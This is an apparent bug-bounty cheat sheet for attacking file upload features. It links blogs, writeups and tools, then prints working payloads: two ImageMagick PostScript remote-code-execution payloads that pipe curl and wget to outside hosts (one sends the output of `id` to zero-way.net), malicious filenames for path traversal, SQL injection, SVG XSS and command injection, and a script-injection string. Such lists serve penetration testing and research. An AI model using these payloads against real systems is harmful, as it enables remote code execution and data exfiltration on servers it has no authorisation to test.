File Upload

Blogs / Articles:

• https://anotherhackerblog.com/exploiting-file-uploads-pt-2/

• https://anotherhackerblog.com/exploiting-file-uploads-pt1/

• https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437

• https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a

• https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/

• https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a

• https://blog.yeswehack.com/yeswerhackers/file-upload-attacks-part-2/

• https://0xn3va.gitbook.io/cheat-sheets/web-application/file-upload-vulnerabilities

Writeups:

• https://link.medium.com/sILCWr8xB3

• https://link.medium.com/V8SdaJ8xB3

• https://link.medium.com/fRfag0byB3

• https://link.medium.com/6qTQZwayB3

• https://link.medium.com/jFGhtvbyB3

Tools:

• Burp Suite Extension - Upload Scanner
• https://github.com/almandin/fuxploider
• https://github.com/ptoomey3/evilarc

Cheatsheets:

Payloads:

• https://github.com/daffainfo/AllAboutBugBounty/blob/master/BypassFileUpload.md

Imagemagick RCE:

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl${IFS}zero-way.net/cc`id`) currentdevice 
putdeviceprops


%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%wget http://https://helloworld.free.beeceptor.com) currentdevice 
putdeviceprops

Tweets:

https://twitter.com/hunter0x7/status/1346397333072846848?s=20

https://twitter.com/HolyBugx/status/1348928810620743682?s=20

Chaining file uploads with other vulns:-

 Set filename to:- 

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections

Bug: XSS through file upload.

Payload: */alert(1)</script><script>/*

File upload tricks and checklist